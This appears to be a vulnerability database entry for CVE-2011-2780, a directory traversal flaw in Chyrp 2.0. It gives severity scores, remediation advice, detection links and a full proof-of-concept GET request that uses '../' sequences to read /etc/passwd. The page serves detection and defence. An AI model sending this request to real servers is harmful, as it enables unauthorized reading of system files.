🔙 목록으로 돌아가기

CVE-2011-2780: Chyrp 2.x - Local File Inclusion

TitleChyrp 2.x - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score5
EPSS Score0.0269
CVE IDCVE-2011-2780
CWE IDCWE-22
Tags cve cve2011 lfi chyrp vuln

🔍 Vulnerability Description

A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744.

🌐 HTTP Request

GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2011/CVE-2011-2780.yaml

🦈 Packet Capture: ⬇️ Download cve-2011-2780.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A